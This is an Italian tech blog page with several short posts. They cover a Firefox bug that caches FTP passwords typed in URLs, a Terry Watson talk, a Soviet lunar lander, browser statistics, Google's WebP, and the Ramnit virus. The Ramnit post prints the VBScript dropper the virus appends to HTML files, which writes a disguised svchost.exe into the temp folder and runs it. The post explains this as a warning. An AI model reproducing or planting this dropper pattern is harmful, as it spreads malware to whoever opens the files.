SIAMO GEEK

  • Firefox: esposizione della password nell’URL

    In mancanza di altri programmi i browser possono essere utilizzate anche come client FTP.

    Per collegarsi, ad esempio, a mail.siamogeek.com con l’utente utente e la password segreta si può digitare questo URL:

    ftp://utente:segreta@mail.siamogeek.com

    Purtroppo Firefox registra questo URL nella cache, quindi se, dopo essersi collegati la prima volta a questo sito, si digita di nuovo l’inizio (o parte) dell’URL ecco cosa appare:

    State, quindi, attenti se utilizzate browser altrui per collegarvi a siti di cui non volete rivelare la password.

    Una segnalazione del baco è già presente in Bugzilla.

    No, l’utente utilizzato per questa dimostrazione non esiste più, è inutile tentare, tanto non funziona. (via Bugtraq)

    Luigi Rosa

  • Terry Watson a Lugano

    Arriviamo assieme a Paolo con largo anticipo per allestire la sala e Terry Watson è già lì che sta chiacchierando con il personale del concessionario Ferrari vicino a cui si terrà l’incontro. Sì, perché le auto sono una delle tante passioni di Terry: ha fatto l’elenco delle automobili che possiede, incluse le due che ha venduto da poco per ragioni di spazio e mi sono perso alla terza.

    Iniziamo a decidere come scombinare la disposizione della saletta e Terry è già a proprio agio: chiacchiera con chi sta cominciando ad arrivare e inizia a raccontare storielle ed esperienze.

    Non posso non accennare a Gene Kranz, di cui Terry ha una grande stima. Una delle grandi figure della storia spaziale americana, su questo non ci piove.

    Prima dell’inizio dell’incontro vero e proprio ha già tirato fuori una chicca: la visualizzazione dei dati delle telemetrie sulle console delle prime missioni Apollo era un esempio di ingegno. I dati erano gestiti da una batteria dei computer IBM più potenti del periodo, i quali, nonostante tutto, riuscivano a visualizzare i valori elaborati su un solo monitor e senza le descrizioni. Il monitor era collocato in un capo di un tubo nero al cui altro capo c’era una telecamera; in mezzo un sistema meccanico spostava delle pellicole trasparenti su cui erano stampate le descrizioni a seconda della schermata selezionata. Il risultato (quando funzionava) era un’immagine televisiva con valori e relative descrizioni che veniva diffusa sui monitor dei controllori. Nelle ultime missioni i computer erano diventati più potenti e riuscivano a visualizzare autonomamente le descrizioni dei dati: ah, la tecnologia!

    Questo è stato il tono dell’incontro e della cena che ne è seguita: storielle, retroscena, foto politicamente scorrette, ricordi della guerra fredda, risate. E un racconto dell’esperienza di pochi giorni prima all’Oktoberfest di Monaco.

    Una serata unica, resa possibile grazie alla passione per le missioni spaziali di Paolo Attivissimo, sul cui blog leggerete tra poco un resoconto probabilmente più dettagliato. A me deve ancora passare l’emozione per aver potuto chiacchierare con Terry Watson per riuscire a mettere assieme qualcosa di più organico.

    Grazie Paolo!

    Aggiornamento 9/10/2010 13:40: alcune foto dell’evento.

    Luigi Rosa

  • Il lander dei Russi

    Jalopnik ha pubblicato alcune foto di quello che sarebbe stato il lander del progetto sovietico per raggiungere la Luna.

    Il cimelio si troverebbe in un laboratorio dell’Istituto dell’Aviazione di Mosca.

    Le due differenze sostanziali rispetto al LEM sono il fatto che questo modello è monoposto e utilizza lo stesso motore per atterrare e per ripartire.

    Luigi Rosa

  • Quando i “blogger” scrivono senza informarsi…

    Ignoranza, by Tsuya85
    Ignoranza, by Tsuya85

    Un paio di giorni fa, su segnalazione di un amico, sono andato a leggere un post su uno dei numerosi blog di una società di Milano.

    L’articolo parla di una delle migliaia mode di questi ultimi tempi, ossia Foursquare. Quello che però mi ha fatto inorridire è la frase con cui viene presentato proprio quest’ultimo giocattolo, ossia: “Foursquare è il più popolare gioco di geocaching esistente sul web.”
    Ma l’autore di questo post ha la benchè minima conoscenza di cosa sia il geocaching? No, non credo proprio, perchè se avesse anche una vaga conoscenza dell’argomento, saprebbe anche che paragonare le due cose non ha assolutamente senso, sia come logica che come funzionamento. Il geocaching è tutt’altra cosa e l’autore dovrebbe fare un giro sul sito ufficiale americano www.geocaching.com, oppure sul sito di riferimento italiano www.geocaching-italia.com.

    Chissà perchè, ma il sapere che su quei blog i post sono pagati… mi fa pensare che pur di fare qualche euro facile in più, si sia disposti a scrivere qualsiasi cosa senza sapere di cosa si stia parlando…

    Kazuma

  • Zuckerberg on Simpsons

    Non poteva mancare.
    Nell’episodio intitolato “Loan-a-Lisa” (stagione 22, episodio 2), andato in onda negli USA il 3 Ottobre scorso, Lisa scambia qualche battuta con Marc Zuckerberg.

    [vimeo width=”201″ height=”113″]http://vimeo.com/15564090[/vimeo]

    Kazuma

  • Aggiornamento per Acrobat

    Dopo quasi un mese dalla diffusione di  uno 0-day, Adobe rilascia finalmente un aggiornamento per il suo reader PDF, le cui versioni attuali diventano 9.4 e 8.2.5; le versioni precedenti non sono più supportate e dovrebbero essere aggiornate quanto prima.

    Se non si verificano altre emergenze, il prossimo aggiornamento del software è previsto per l’8 febbraio 2011.

    Luigi Rosa

  • Apolo 13: Mission Control

    [vimeo http://vimeo.com/14443510 w=480]

    Apollo 13: Mission Control è uno spettacolo teatrale interattivo ambientato in una sala allestita come il controllo missione di Houston in cui vengono ricreati i momenti salienti della missione.

    Peccato che sia dall’altro capo del pianeta.

    Luigi Rosa

  • Catalessi sugli allori

    StatCounter è uno dei tanti siti che offre un servizio di analisi di traffico web. Il sito ha pubblicato una statistica anno su anno secondo la quale Internet Explorer sarebbe sceso poco sotto la quota psicologica del 50% di share.

    Non ho trovato (se c’è) l’errore medio della statistica per capire quale sia l’errore di quel 49,87% dello share di Explorer in settembre, quindi il dato va preso per quello che è: una statistica.

    Per la seconda volta vediamo un browser con quote bulgare di mercato perderle per cause più interne che esterne.

    Netscape Navigator ha di fatto guidato la prima (e molto confusa) corsa al web della metà degli anni ’90; dobbiamo proprio a Netscape molte innovazioni dell’HTML, brutte o belle che siano. In quel periodo Microsoft, dopo un primo periodo in cui ha ignorato Internet, giocava molto all’inseguimento, mentre Netscape dominava il mercato. Tutto ciò fino alla versione 3.0, in cui non è stato data importanza al miglioramento del programma, ma ci si è concentrati sull’aggiunta di feature, alcune interessanti (un client di mail), altre un po’ inutili per l’utente quadratico medio (l’editor HTML visuale). Il caravanserraglio che è risultato da questo ingrasso non ha fatto altro che facilitare l’ascesa di Explorer, che, con tutti i suoi innumerevoli difetti, alla fine era più utilizzabile di Netscape.

    (altro…)

    Luigi Rosa

  • Virus che attacca un eseguibile ai file HTML

    Sembra una delle tante leggende metropolitane, come quella del virus che si annidava nella memoria di configurazione del PC, invece è possibile.

    Il virus in questione è W32/Ramnit che infetta file EXE, DLL e HTML.

    Un volta caricato in memoria il virus accoda ai file HTML questo codice VBScript:
    <SCRIPT Language=VBScript><!--
    DropFileName = "svchost.exe"
    WriteData = "4D5A90000300000004000...0000000000000"
    Set FSO = CreateObject("Scripting.FileSystemObject")
    DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
    If FSO.FileExists(DropPath)=False Then
    Set FileObj = FSO.CreateTextFile(DropPath, True)
    For i = 1 To Len(WriteData) Step 2
    FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
    Next
    FileObj.Close
    End
    If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0
    //--></SCRIPT>

    Il codice qui sopra scrive un file SVCHOST.EXE (un nome che non desta sospetti se visto nel task manager di Windows) nella directory temporanea dell’utente prendendo il contenuto dalla variabile WriteData, che contiene il carico di infezione vero e proprio (notare che i primi due byte sono il magic number dei Portable Executable). Se la scrittura va a buon fine, lo script tenta di eseguire il file.

    È vero: non è così immediato il fatto che ogni file HTML infettato diventi un vettore di infezione, ma questo è un ulteriore esempio di come file apparentemente innocui possano essere utilizzati per diffondere del malware. (via TrustedSource)

    Luigi Rosa

  • Sarah Connor?

    [youtube=http://www.youtube.com/watch?v=mMhrvKEmyTY&w=480]

    Luigi Rosa

  • L’universo in potenze di 10

    [youtube=http://www.youtube.com/watch?v=qxXf7AJZ73A&w=480]

    La moderna tecnologia ci permette oggi di riassaporare vecchi documentari, rifatti con un tocco di Full HD.

    La voce di Morgan Freeman accompagna perfettamente questo viaggio nell’Universo preso a “piccole dosi”: a potenze di 10.

    treguna

  • La nuova sfida di Google

    Google non si ferma mai, nemmeno davanti a pietre miliari del web come lo standard di compressione definito dal Joint Photographic Expert Group (si, parlo proprio del JPEG), ideando il WebP, un nuovo metodo di compressione , anch’esso “lossy” (ossia con perdita di informazioni), ma che, a detta di Google, dovrebbe garantire, a parità di qualità, un incremento di compressione di circa il 39%.

    Personalmente sono più che convinto che Google non riuscirà a soppiantare facilmente un sistema di compressione così diffuso, come il JPEG, ma devo ammettere che le premesse ci sono, anche se sarà ovviamente il tempo (e la capacità di Google) a dare la risposta a questo dubbio.

    A breve ‘weppy‘ (questa è la pronuncia) dovrebbe essere integrato in Chrome ed avendo rilasciato tutto il sistema come Open Source Google sperando nel supporto della community. Per ora sono disponibili i sorgenti e una versione precompilata per Linux 64bit. Sicuramente a breve verrà rilasciato qualcosa per Windows.

    Nel frattempo bisogna fidarsi di Google e vedere qualche esempio di WebP… attraverso il vecchio formato PNG.

    Kazuma